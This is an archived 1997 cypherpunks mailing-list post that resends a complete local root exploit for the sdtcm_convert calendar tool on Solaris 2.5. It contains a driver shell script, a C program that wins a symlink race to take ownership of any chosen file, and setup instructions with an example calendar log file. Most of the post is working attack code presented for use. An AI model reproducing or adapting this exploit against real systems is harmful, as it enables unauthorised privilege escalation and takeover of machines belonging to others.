1997-02-23 - Exploit for sdtcm_convert - Solaris 2.5 - second
Header Data
From: Cristian SCHIPOR <skipo@sundy.cs.pub.ro>
To: cypherpunks@toad.com
Message Hash: 2e884c5582549d4f26ecd942c3ab4419c0ec9a44832ac4482546e44f3ec1988a
Message ID: <Pine.GSO.3.95.970223111505.1649C-100000@sundy.cs.pub.ro>
Reply To: N/A
UTC Datetime: 1997-02-23 09:21:50 UTC
Raw Date: Sun, 23 Feb 1997 01:21:50 -0800 (PST)
Raw message
From: Cristian SCHIPOR <skipo@sundy.cs.pub.ro>
Date: Sun, 23 Feb 1997 01:21:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Exploit for sdtcm_convert - Solaris 2.5 - second
Message-ID: <Pine.GSO.3.95.970223111505.1649C-100000@sundy.cs.pub.ro>
MIME-Version: 1.0
Content-Type: text/plain
Sun Feb 23 10:36:58 EET 1997 Romania
"Exploit for sdtcm_convert - Solaris 2.5"
I send you an e-mail about a bug and an exploit for sdtcm_convert.
(sdtcm_convert allows you to become owner of any file or directory from
the system - and gain root access )
First, there was some problems with my uuencoded exploit (some damaged it
on the route...) so i'll resend you the files for exploit.
Second, Casper Dick send me:
>Is this the bug fixed in the Sun patches:
>103670-02: CDE 1.0.2: sdtcm_convert has a security vulnerability
>103671-02: CDE 1.0.1: sdtcm_convert has a security vulnerability
>103717-02: CDE 1.0.2: sdtcm_convert has a security vulnerability (x86
version)
>103718-02: CDE 1.0.1: sdtcm_convert has a security vulnerability (x86
version)
>or is it a new one?
>Casper
I cant found this patches to verify if that fix the problem i have
found or not. Anyway you have an exploit ! (execute 'thefist' and wait)
Cristian Schipor - Computer Science Faculty - Bucharest - Romania
Email: skipo@math.pub.ro skipo@sundy.cs.pub.ro skipo@ns.ima.ro
Phone: (401) 410.60.88
------------------------- file thefirst ------------------------------------
/bin/echo "orange.c -> orange"
gcc -o orange orange.c
/usr/ucb/whoami > wh
read USER < ./wh
#watching for callog file if it isnt will stop
if ! test -f /var/spool/calendar/callog.$USER; then
/bin/echo "I cant found callog file. Please read README and create it"
exit;
fi
/bin/echo "what's the target ???"
read TARGET
/bin/echo /bin/chmod 000 /var/spool/calendar/callog.$USER >lemon
/bin/echo /usr/dt/bin/sdtcm_convert $USER >>lemon
/bin/chmod 700 ./lemon
./orange $TARGET $USER
------------------------- end --------------------------
------------------------ file orange.c ---------------------------
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#define path "/var/spool/calendar/callog."
void main(int argc, char *argv[])
{
int pid,filedes[2];
FILE *f;
struct stat info;
long i;
char target[128],shift[128];
strcpy(target,argv[1]);
strcpy(shift,path);
strcat(shift,argv[2]);
if(pipe(filedes))
{
perror("cant crate pipe\n");
exit(0);
}
if(pid=fork()==0)
{
for(i=0;i<30000000;i++);
unlink(shift);
symlink(target,shift);
write(filedes[1],"y\n",sizeof("y\n"));
}
else
{
close(0);
dup(filedes[0]);
system("lemon");
stat(target,&info);
if(info.st_uid==getuid()) printf("COLL I did IT !!!\n");
}
}
------------------------ end ----------------------------
------------------------ file README ----------------------
*How to make a simple callog file*
If you dont have a /var/spool/calendar/callog.YOU edit callog.example,
replace 'skipo' with your user name and 'sundy.cs.pub.ro' with your
machine name (try first the short name, example: sundy and if you'll have
troubleshotings try the long name, example sundy.cs.pub.ro). After that
copy the new callog file in /var/spool/calendar/callog.YOUR_USER_NAME, run
once sdtcm_convert with your user name (example sdtcm_convert skipo)
and wait for corrections. Now you are ready to run the exploit.
Another way is to run calendar tool from CDE.
------------------------- end -------------------------------
------------------------ file callog.example ------------------------
Version: 4
**** start of log on Fri Dec 6 14:07:43 1996 ****
(calendarattributes ("-//XAPIA/CSA/CALATTR//NONSGML Access List//EN","10:access_list","world:2")
("-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN","5:string","skipo@sundy.cs.pub.ro")
("-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN","6:user","skipo@sundy.cs.pub.ro")
("-//XAPIA/CSA/CALATTR//NONSGML Character Set//EN","5:string","C.ISO-8859-1")
("-//XAPIA/CSA/CALATTR//NONSGML Date Created//EN","7:date_time","19961206T120743Z")
("-//XAPIA/CSA/CALATTR//NONSGML Product Identifier//EN","5:string","-//DT//NONSGML Calendar Product Version 1//EN")
("-//XAPIA/CSA/CALATTR//NONSGML Version//EN","5:string","-//XAPIA/CSA/VERSION1/NONSGML CSA Version 1//EN")
)
-------------------------- end --------------------------------
Thread
Return to February 1997
Return to “Cristian SCHIPOR <skipo@sundy.cs.pub.ro>”
1997-02-23 (Sun, 23 Feb 1997 01:21:50 -0800 (PST)) - Exploit for sdtcm_convert - Solaris 2.5 - second - Cristian SCHIPOR <skipo@sundy.cs.pub.ro>